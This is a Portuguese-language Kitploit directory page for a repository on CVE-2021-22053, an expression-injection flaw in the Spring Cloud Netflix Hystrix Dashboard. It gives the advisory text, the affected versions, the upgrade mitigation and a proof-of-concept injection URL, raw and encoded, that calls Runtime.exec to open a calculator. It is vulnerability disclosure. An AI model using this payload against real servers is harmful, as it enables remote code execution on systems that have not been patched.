Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Vulnerabilidade de resolução de template do Spring Cloud Netflix Hystrix Dashboard CVE-2021-22053 | Kitploit
Ferramentas/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Vulnerabilidade de resolução de template do Spring Cloud Netflix Hystrix Dashboard CVE-2021-22053

Ver Repositório
3781há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-22053: Vulnerabilidade de resolução de templates do Spring Cloud Netflix Hystrix Dashboard

Severidade

Alta

Fornecedor

Spring por VMware

Descrição

Aplicações que utilizam tanto spring-cloud-netflix-hystrix-dashboard quanto spring-boot-starter-thymeleaf expõem uma forma de executar código enviado no caminho da URI da requisição durante a resolução de templates de visualização. Quando uma requisição é feita para /hystrix/monitor;[dados fornecidos pelo usuário], os elementos do caminho que seguem hystrix/monitor são avaliados como expressões SpringEL, o que pode levar à execução de código.

Produtos e versões afetados da VMware

A severidade é alta, exceto quando indicado de outra forma.

  • Spring Cloud Netflix
    • 2.2.0.RELEASE a 2.2.9.RELEASE
    • Versões mais antigas e sem suporte também são afetadas

Mitigação

Usuários das versões afetadas devem aplicar a seguinte mitigação: os usuários devem atualizar para 2.2.10.RELEASE+. Nenhuma outra etapa é necessária. As versões que corrigiram este problema incluem:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

Crédito

Esta vulnerabilidade foi identificada e relatada de forma responsável por threedr3am do SecCoder Security Lab ([email protected]).

Referências

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Histórico

2021-11-17: Relatório inicial da vulnerabilidade publicado.

POC

bruto:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

codificado:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

PS. A barra diagonal '/' não pode ser usada no comando.

Baixar ferramenta